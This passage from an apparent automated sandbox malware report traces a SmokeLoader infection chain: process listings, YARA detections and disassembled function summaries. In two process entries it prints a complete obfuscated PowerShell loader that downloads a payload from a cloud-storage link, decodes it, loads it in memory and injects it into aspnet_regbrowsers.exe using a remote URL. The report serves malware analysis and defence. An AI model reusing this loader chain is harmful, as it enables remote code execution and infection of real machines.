Imagebase:	0xf70000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:14:41
Start date:	23/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"
Imagebase:	0xf80000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:14:47
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"
Imagebase:	0xad0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:14:48
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0xcb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:14:48
Start date:	23/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:14:48
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
Imagebase:	0xcb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:15:16
Start date:	23/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Imagebase:	0x180000
File size:	46'112 bytes
MD5 hash:	BB8B6B54FD50C08AB579B84BF07918CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:15:16
Start date:	23/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Imagebase:	0x820000
File size:	46'112 bytes
MD5 hash:	BB8B6B54FD50C08AB579B84BF07918CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:15:21
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	02:15:40
Start date:	23/10/2024
Path:	C:\Users\user\AppData\Roaming\wihaduv
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wihaduv
Imagebase:	0xc50000
File size:	46'112 bytes
MD5 hash:	BB8B6B54FD50C08AB579B84BF07918CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:15:41
Start date:	23/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:15:44
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:15:45
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:15:46
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:15:47
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	02:15:48
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:15:49
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	02:15:50
Start date:	23/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4232 -s 704
Imagebase:	0x7ff777350000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:15:50
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	02:15:51
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	02:15:52
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 06670FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6670000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06670FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6670000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06670FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6670000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7848, Parent PID: 7744COMMON

Executed Functions

Function 03174BB0 Relevance: 2.0, APIs: 1, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1442130310.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61702e696fd3a2cc1212ea739ad6a0a47c4f8c22ef1ebb4f11205507c8b5371
Instruction ID: 7f51831bc205572542d9cde069b948039697acaff18d5b31d30852e282e1877e
Opcode Fuzzy Hash: c61702e696fd3a2cc1212ea739ad6a0a47c4f8c22ef1ebb4f11205507c8b5371
Instruction Fuzzy Hash: 3F221974A00219AFDB05CF99D884A9EFBB2FF89310F298159E815AB351C775ED81CB90

Function 076C1178 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

84Tj, xrefs: 076C14C3
84Tj, xrefs: 076C14B7
84Tj, xrefs: 076C12D5
84Tj, xrefs: 076C12E1
84Tj, xrefs: 076C13D2
84Tj, xrefs: 076C13C6

Memory Dump Source

Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID:
String ID: 84Tj$84Tj$84Tj$84Tj$84Tj$84Tj
API String ID: 0-126198043
Opcode ID: 4c295194a010c792fff5f9a4a71fbeac7e6fe46f8b8cbb1e7d3cfe0cb7ff76d2
Instruction ID: 3c017edf9eaaa20ba7853c420eb368a3c6b7b7e3d9e73321a3a014c61ccb24c7
Opcode Fuzzy Hash: 4c295194a010c792fff5f9a4a71fbeac7e6fe46f8b8cbb1e7d3cfe0cb7ff76d2
Instruction Fuzzy Hash: 0BF1C7F0B002199BDB18DF69C454B7ABBF2EF86311F24805DE906AB352DB71DD428B91

Function 076C115E Relevance: 4.0, Strings: 3, Instructions: 240COMMON

Download Yara Rule

Strings

84Tj, xrefs: 076C14B7
84Tj, xrefs: 076C12D5
84Tj, xrefs: 076C13C6

Memory Dump Source

Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID:
String ID: 84Tj$84Tj$84Tj
API String ID: 0-4275270300
Opcode ID: 3fa900d988d6ad62f236630d709f0f44fa6e724f27bc6a54957329e94efccb8a
Instruction ID: f769e5ba573788d1fdaf39e30c87c4a3a8457a09c4a7ff7e7ec22d96a6a313cf
Opcode Fuzzy Hash: 3fa900d988d6ad62f236630d709f0f44fa6e724f27bc6a54957329e94efccb8a
Instruction Fuzzy Hash: 109182F4A00219DBCB28DF58C454B79B7F2EB86311F25805DE906AB352DB71DD82CB91

Function 076C04F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

84Tj, xrefs: 076C052F
84Tj, xrefs: 076C0523

Memory Dump Source

Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd

Similarity

API ID:
String ID: 84Tj$84Tj
API String ID: 0-1570688683
Opcode ID: 6843e03fb03b90185fbf6d18c898965ee33149fb9acfe18e947a2d733c332e60
Instruction ID: c57d00586229ef9831930fa9cb906e835659a6d361a0ed03d1d6e3d803ea0f29
Opcode Fuzzy Hash: 6843e03fb03b90185fbf6d18c898965ee33149fb9acfe18e947a2d733c332e60
Instruction Fuzzy Hash: 08515AB27043149BDB20DB759C10B7ABBA2EF86721F54805EE646DF381DA71DC4287A1

Function 03171A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031751C9

Memory Dump Source

Source File: 00000001.00000002.1442130310.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3170000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 2f20170976f13d09cc51a240d7b6eeff4328d9b07cad3a03c218e1a48c2d9ae0
Instruction ID: 7b2674aa4fc1eb4109108d14d5ea425a871a86ef8a95e1a41e0461c4fd4253e4
Opcode Fuzzy Hash: 2f20170976f13d09cc51a240d7b6eeff4328d9b07cad3a03c218e1a48c2d9ae0
Instruction Fuzzy Hash: 2A2104B1D01359AFCB14CF9AD984ADEFBF5FB48310F14812AE918A7210D374AA54CBA4

Function 02E0D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441203974.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06e252f075dcde587033f64094bf82f37bc2868bbc10e6fff336e2b1c1765fa
Instruction ID: e6cda32dedd21d06afda74ca93ccd499dd36a86dd8325763618c8d8309569388
Opcode Fuzzy Hash: e06e252f075dcde587033f64094bf82f37bc2868bbc10e6fff336e2b1c1765fa
Instruction Fuzzy Hash: 2C01ED6144E3C05FD7128B258D94B56BFB4DF43228F19C1DBD9888F1A7C2695849C772

Function 02E0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441203974.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994c94c82e6a8f47b3d04375c2af23c9865205bcd48374ef5adcc86ae292a768
Instruction ID: a223d3ac1287859f997ea5d70a04078956f7d3722eed97775c8e63f3d90c6471
Opcode Fuzzy Hash: 994c94c82e6a8f47b3d04375c2af23c9865205bcd48374ef5adcc86ae292a768
Instruction Fuzzy Hash: 9201D4714443409BE7208A51CDC0BA6BB98DF42328F18C41AED4D4A182C3799882CBB2

Analysis Process: powershell.exePID: 7988, Parent PID: 7848COMMON

Executed Functions

Function 04E74C20 Relevance: 3.9, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

;n^, xrefs: 04E74D39
;n^, xrefs: 04E74CDA
;n^, xrefs: 04E74CEA

Memory Dump Source

Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID: ;n^$;n^$;n^
API String ID: 0-120871381
Opcode ID: ee1d9c091d9ab136922df8ab7a28873f3dd7d2e9e8f03e3649e8046e9bbe9968
Instruction ID: bdd5c7400304f1e47783b25fd7d63eb6c933e43324557d3d36be6a6e98840dcc
Opcode Fuzzy Hash: ee1d9c091d9ab136922df8ab7a28873f3dd7d2e9e8f03e3649e8046e9bbe9968
Instruction Fuzzy Hash: 5641B57060A3C58FC703CB68C89459ABFB0FF97254B1940DBD085DF2A3D675A806CB62

Function 079B1C10 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08642b1fff3ea455bb96263940b387ff2d04e74895a0288a607dddc9e9d95447
Instruction ID: df54b305c58d2f31d41b6dc926ac7ef8261f1c910ed5bb42490c58b2b7df6f6a
Opcode Fuzzy Hash: 08642b1fff3ea455bb96263940b387ff2d04e74895a0288a607dddc9e9d95447
Instruction Fuzzy Hash: 871247B1B043198FCB358B6889207EABBF6EFC2219F1480BAD505CB251DF75D941C7A1

Function 04E729F0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db719da347e00603e105253644a20cae346859b9346401e1a81b653d739e3807
Instruction ID: 44d5f10cd5b5576510e04b23f51cb27604b24571635f5eb0c8ef8d2ab6425632
Opcode Fuzzy Hash: db719da347e00603e105253644a20cae346859b9346401e1a81b653d739e3807
Instruction Fuzzy Hash: BC91AC74A006058FCB15CF59C494AAEFBB1FF88320B248699D955AB365C736FC91CFA0

Function 079B1BF1 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff22ba35b153ba064aa5fe2e77c0847684800ef97633fa97033946abc6c75ec
Instruction ID: ba7a14c522b17e5c8d80dac08d0f92caf718de2fa7a76e47427343968dec44b3
Opcode Fuzzy Hash: 0ff22ba35b153ba064aa5fe2e77c0847684800ef97633fa97033946abc6c75ec
Instruction Fuzzy Hash: F641F3F0A8020ADFCB35CF598720BE97BFAAF85219F5480A6C9049F265CB35D941C7A1

Function 04E72B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2da531a87d98621aa9aac379ff836b03cbdee3e39bf7a80e593776538b98fa1
Instruction ID: c2a1aa624a08b420fe9e03a891d2ce7b7fafedf6d27f32004570042c0ac53807
Opcode Fuzzy Hash: b2da531a87d98621aa9aac379ff836b03cbdee3e39bf7a80e593776538b98fa1
Instruction Fuzzy Hash: BF413A74A006059FCB09CF59C498AAAFBB1FF48324B219599D915AB365C732FC91CFA0

Function 04E74BF0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

